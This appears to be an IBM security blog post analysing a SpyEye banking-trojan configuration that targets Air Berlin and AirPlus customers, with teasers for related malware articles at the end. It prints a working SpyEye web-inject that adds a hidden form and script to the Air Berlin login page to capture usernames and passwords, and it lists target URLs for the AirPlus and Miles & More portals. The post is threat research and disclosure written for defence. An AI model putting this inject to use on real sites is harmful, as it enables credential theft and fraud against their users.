IBM has uncovered a SpyEye configuration that targets users of two leading European airline travel websites: Air Berlin, the second-largest airline in Germany after Lufthansa, and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud.

Travel Companies Become Trojan Targets

The two companies are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users.

Air Berlin, now Europe’s sixth-largest airline, not only accepts debit and credit cards, but allows Austrian, Dutch and German citizens to pay by bank direct debit seven days before traveling. That means that criminals targeting an Air Berlin traveler from those countries stand a good chance of obtaining users’ personal details, including date of birth, which users must provide on the airline’s site, as well as their bank account details.

AirPlus, meanwhile, offers a variety of travel services for companies of all sizes on their website, all paid for by business payment cards, which are invariably linked to business bank accounts.

Since corporate accounts tend to carry much higher balances or credit limits than consumer accounts, they have much greater data-harvesting, and therefore revenue, potential for cybercriminals.

Data Harvesting Through HTML Injection

In the case of the Air Berlin attack, SpyEye attempts to harvest confidential user information, including username and password and other data that is entered on the targeted Web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated.

SpyEye’s injection code captures the information on username and password details:

<WebInjects action="Inject|POST|GET"><Url><![CDATA[https://www.airberlin.com/site/yab/login/login*]]></Url><AuxUrl><![CDATA[]]></AuxUrl><WebInject><Before><![CDATA[<body>]]></Before><Data><![CDATA[<iframe name=ifr1 id=ifr1 src="https://www.airberlin.com/site/images/spacer.gif" width=0 height=0 border=none></iframe><form id=form7 name=form7 target=ifr1 method=post action="https://www.airberlin.com/site/images/spacer.gif"><input type="hidden" name="cc" id="cc" /><input type="hidden" name="pas" id="pas" /></form><script>function dosubmit(){document.form7.cc.value=document.getElementById('login').value;document.form7.pas.value=document.getElementById('pass').value;document.form7.submit();}</script>]]></Data><After><![CDATA[]]></After></WebInject><WebInject><Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before><Data><![CDATA[ onclick="dosubmit()"]]></Data><After><![CDATA[]]></After></WebInject>

The AirPlus attack methodology, meanwhile, targets users of the Lufthansa Miles & More Visa credit card which offers bonus travel for purchases made using the card.

Similar to the Air Berlin attack, the SpyEye code targets the main login URL of the AirPlus portal:

<mark data-hasqtip="true" class="tempMark"><Url><![CDATA[https://portal.airplus.com/welcome*]]></Url> <Url><![CDATA[https://www.miles-and-more.kartenabrechnung.de/welcome*]]></Url></mark>

In this instance, SpyEye injects code that claims to be an anti-fraud enhancement into the user’s Web browser.

In reality, of course, this is a cleverly disguised attempt to phish user credentials from the unsuspecting customer of the AirPlus Web portal. Those credentials are quite comprehensive and include the card name and number, expiration date, CVV (signature strip) number and, as with the Air Berlin attack, the user’s date of birth.

The harvesting of the user’s date of birth opens up the possibility of identity theft and, we have observed, committing fraud by impersonating the user or using social engineering attack methods.

Conclusions

It is important to understand that cybercrime is now highly organized, with specialization of duties assigned to different members of the criminal hierarchy. That means that the darkware coding gangs behind the variants of SpyEye are now choosing their targets carefully for maximum revenue yield with minimal effort. In addition, by enhancing the fraudulent data yield from each victim, the possibilities for resale of data go way beyond that of the carder forums seen in the last few years.

We believe that the cybercriminal gang(s) behind the attacks are almost certainly using a semi-automated methodology of code development, allowing them to develop customized versions of the malware for specific purposes.

Clearly, the travel trade offers cybercriminals access to user and company account credentials with larger-than-normal account balances and credit card limits. Gaining access to Air Berlin bank account details in Austria, Germany and the Netherlands is an indication of targeting ingenuity.

Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from SpyEye infections because the malware uses targeted reconnaissance combined with signature-detection evasion techniques to get a foothold inside computers.

A better alternative for protecting Web-based services from becoming Trojan targets is to implement secure Web access. For example, browser-based tools that secure communication between the computer and cloud service provider website can prevent common attack methods like HTML injection and keylogging from grabbing data. Those same technologies can protect other browser-based applications, such as VPNs, CRM, retail, financial and collaboration systems that malware can exploit to steal user credentials and breach an enterprise’s security perimeter completely undetected.

We expect to see more specialized versions of SpyEye shortly.

More from Malware

Kronos Malware Reemerges with Increased Functionality

The Evolution of Kronos Malware The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims. After remaining…

A View Into Web(View) Attacks in Android

James Kilner contributed to the technical editing of this blog. Nethanella Messer, Segev Fogel, Or Ben Nun and Liran Tiebloom contributed to the blog. Although in the PC realm it is common to see financial malware used in web attacks to commit fraud, in Android-based financial malware this is a new trend. Traditionally, financial malware in Android uses overlay techniques to steal victims’ credentials. In 2022, IBM Security Trusteer researchers discovered a new trend in financial mobile malware that targets…

RansomExx Upgrades to Rust

IBM Security X-Force Threat Researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language, joining a growing trend of ransomware developers switching to the language. Malware written in Rust often benefits from lower AV detection rates (compared to those written in more common languages) and this may have been the primary reason to use the language. For example, the sample analyzed in this report was not detected as malicious in the…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group 'Evil Corp,' which is the same…